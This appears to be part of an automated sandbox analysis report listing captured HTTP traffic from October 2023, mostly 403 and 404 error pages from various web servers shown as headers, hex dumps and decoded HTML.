                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:51:41 GMTServer: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:51:41 GMTServer: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:51:43 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveX-Seen-By: Qizr2MOzfO8jjTBKBVmOj6nPWIDxfKj16yM6xXYJ3IE=,m0j2EEknGIVUW/liY8BLLt74xaww/PT6pi0s4xt7dnMm++C2XkuTvnlRFg2XiSDLX-Wix-Request-Id: 1696859503.7763167331873126237X-Content-Type-Options: nosniffData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:51:43 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=h8rwYOD%2FzPxru%2FKmxIV1uI3mjQMEMtm6wvEoptEkm4NqrtPcazmjYZzBcGGwBnzJxvcfdK4NwUazMPv4VrvluCOXYxAoCiobvPns6L6fuE%2FeFIHEvLRgwkHMY%2Bk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8137199beebc7e82-LAXalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 09 Oct 2023 13:51:44 GMTContent-Type: text/htmlContent-Length: 2843Connection: keep-aliveVary: Accept-EncodingLast-Modified: Thu, 26 Jul 2018 17:13:08 GMTETag: "b1b-571ea1be9f445"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:51:44 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:51:45 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Oct 2023 13:51:49 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977Server-Timing: processing;dur=16X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-us-west2,gcp-us-central1,gcp-us-central1X-Request-ID: c5a027b9-3ad2-403b-aa0b-130c4517769aCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BNpj2j1iir4yrjuItm%2BzO6fkuCZ41t%2BxabcayykQ36z8UT1DhWxsAC9HXzNyrM6RrIJXlYm52Letbft7h6%2F3I4nSzTI1xVWlvlWVwcdBtPcIysFi7Pm7KIjTZ79hVt4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=89.999914Server: cloudflareCF-RAY: 813719babc23091d-LAXalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 09 Oct 2023 13:51:18 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Oct 2023 13:51:53 GMTServer: ApacheLast-Modified: Tue, 13 Sep 2022 03:21:02 GMTAccept-Ranges: bytesContent-Length: 1260Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77562Content-Type: text/html; charset=UTF-8Date: Mon, 09 Oct 2023 13:51:55 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: uHGlRLDi/m13nV9C1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Oct 2023 13:51:57 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 246X-Sorting-Hat-ShopId: 9394790Server-Timing: processing;dur=13X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-us-west2,gcp-us-central1,gcp-us-central1X-Request-ID: f2d03dc8-59ac-4289-a4e6-f60432e30263CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JKDt2W1vC4tHSZztpAmbiTs19stTpE%2BhhNlHMpLBqjzh%2FZxyIKYK9Twe8oIYHPIVDA3j2OUhYxS2SyA98fUw%2BJNMkMj04O9gvBB%2Fo0aSRlWoZbYJpJL2%2FaNJpBCd"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=78.999758Server: cloudflareCF-RAY: 813719f22b317e83-LAXalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Oct 2023 13:51:57 GMTServer: Apache/2.4.57 (Ubuntu)Content-Length: 273Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 6f 72 6b 70 6c 75 73 2e 68 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.57 (Ubuntu) Server at workplus.hu Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:51:58 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Thu, 12 Aug 2021 07:53:38 GMTAccept-Ranges: bytesContent-Length: 15513Vary: Accept-Encoding,User-AgentKeep-Alive: timeout=5, max=100Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 50 6c 61 63 65 20 66 61 76 69 63 6f 6e 2e 69 63 6f 20 61 6e 64 20 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 20 69 6e 20 74 68 65 20 72 6f 6f 74 20 64 69 72 65 63 74 6f 72 79 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 62 61 73 65 20 63 73 73 20 73 74 79 6c 65 73 2d 2d 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 20 20 20 2e 70 69 63 6e 6f 74 65 20 7b 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6f 6e 74 